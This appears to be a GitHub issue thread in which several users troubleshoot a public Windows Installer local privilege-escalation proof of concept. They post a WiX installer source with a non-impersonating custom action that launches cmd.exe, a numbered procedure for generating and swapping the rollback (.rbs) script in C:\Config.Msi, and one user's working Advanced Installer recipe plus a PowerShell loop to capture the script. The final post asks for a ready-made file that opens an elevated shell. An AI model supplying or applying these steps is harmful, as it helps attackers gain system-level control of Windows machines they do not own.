How can I develop my .rbs file?

[Bl4ckM1rror]

Hi, Congratulations on your project, it is really a awesome research!

One question: I have an issue with the trigger of the .rbs file.

I have created the following .msi which successfully triggers the payload (cmd.exe) as can be seen from the PoC.

The problem is that when I replace cmd.rbs with my .rbs (inside C:\Config.Msi), nothing happens.

This is my source code for the execution of my payload :

<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Demo" Version="0.0.1" Manufacturer="demo" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
    <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>

    <Directory Id="TARGETDIR" Name="SourceDir">
        <Directory Id="ProgramFilesFolder">
            <Directory Id="INSTALLLOCATION" Name="Example">
                <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
                    <File Id="ApplicationFile1" Source="C:\\Windows\\System32\\cmd.exe"/>
                </Component>
            </Directory>
        </Directory>
    </Directory>

    <Feature Id="DefaultFeature" Level="1">
        <ComponentRef Id="ApplicationFiles"/>
    </Feature>

    <Property Id="cmdline">
        cmd.exe
    </Property>

    <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

    <InstallExecuteSequence>
        <Custom Action="SystemShell" After="InstallInitialize"></Custom>
    </InstallExecuteSequence>
</Product>

Can you help me? Thanks in advance.

[Wh04m1001]

Hi,

Thanks :).

I used Advanced Installer to create MSI and RBS file. You may want to change Execute="deferred" to Execute="rollback"? I didnt use wix so not very familiar with it.

[Bl4ckM1rror]

Thank u for the quick reply :) I edited from Execute="deferred" to Execute="rollback", but it didn't work.

Anyway, I read a lot about the documentation, and if I have understood correctly the entire process is:

1. I have to create an .exe (for example: C++ code with WinExec("cmd.exe", 0) instruction for spawn cmd.exe process like in the PoC)
2. I convert the previous .exe to .msi with Windows Installer Advanced
3. run .msi
4. run this powershell command Get-ChildItem -Path C:\ -Filter *.rbs -Recurse -Force -ErrorAction SilentlyContinue and I should find an .rbs (Rollback script) file into C:\Config.Msi folder
5. Finally, I replace my payload (previous .rbs file) with cmd.rbs file(into the PoC project)

did I understand correctly? if so, can I use both C# and C++? and Console or Application?

Thanks a lot!

[ms17-o1o]

I read this thread and its really helpful. Thanks for the pointers on using Advanced Installer and snatching the rbs file from the C;\Config.msi folder. It worked for me.

In order to configure the rbs file, one can install Advanced Installer, create a new Enterprise installer package, generate two custom actions (one deferred and one rollback), and sequence the rollback custom action just before the deferred custom action. I used "Launch EXE with Working Directory" for the rollback Custom Action type, and I set "File Path" as cmd.exe and "Command Line" as the command you want to execute. Working directory can be anything. Build the installer.

Before running the installer, run a powershell command (with administrator rights) to loop while trying to look out for any rbs file in the C:\config.msi folder and copy it to a writable folder. Then run the installer. When the installation completes, you should see a rbs file in the copied folder.

[kumarchanti]

After changing from Execute="deferred" to execute="rollback" it did not worked me not able to spawn the cmd.exe with elevated privileges can you share the rbs file which opens cmd.exe with elevated privileges